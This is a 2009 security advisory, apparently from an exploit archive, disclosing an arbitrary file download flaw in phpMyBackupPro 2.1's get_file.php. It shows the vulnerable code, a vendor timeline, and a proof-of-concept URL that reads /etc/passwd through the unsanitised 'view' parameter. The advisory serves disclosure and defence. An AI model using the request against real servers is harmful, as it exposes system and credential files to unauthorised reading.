phpMyBackupPro 2.1 arbitrary file download

2009-11-19 / 2009-11-20
Credit: Amol Naik
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

################################################################################ Arbitrary File Download in phpMyBackupPro Name Arbitrary File Download in phpMyBackupPro Systems Affected phpMyBackupPro v 2.1 and possibly earlier versions site http://www.phpmybackuppro.net Author Amol Naik (amolnaik4[at]gmail.com) Date 16/11/2009 ################################################################################ ############ 1. OVERVIEW ############ phpMyBackupPro is a web-based MySQL backup application in PHP. You can schedule backups, download, email or upload them with FTP and backup whole file directories. Zip and gzip compression, easy interface and installation. Many languages and online help! ############### 2. DESCRIPTION ############### phpMyBackupPro is vulnerable to Arbitrary File Download. ###################### 3. TECHNICAL DETAILS ###################### Arbritrary File Downlaod ++++++++++++++++++++++++ Vulnerable page get_file.php Vulnerable Parameters view Vulnerable Code --------------------------------------------------------------------------------------- // show the requested file if (isset($_GET['view']) && file_exists($_GET['view'])) { if (isset($_GET['download'])) { header("Content-Type: application/octet-stream"); header("Content-Disposition: attachment; filename=".basename($_GET['view'])); readfile($_GET['view']); } else { ...... ...... ....... } --------------------------------------------------------------------------------------- The parameter "view" is not properly sanitized which results in Arbitrary file download. ++++ POC ++++ http://localhost/phpMyBackupPro/get_file.php?download=true&view=/etc/passwd ############ 4. TimeLine ############ 20th Oct 2009 Bug Discovered 20th Oct 2009 Reported to Vendor 27th Oct 2009 vendor agreed to the vulnerablity and ready to fix it. 16th Nov 2009 No communication received about the status of the fix. 16th Nov 2009 Public Disclosure


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top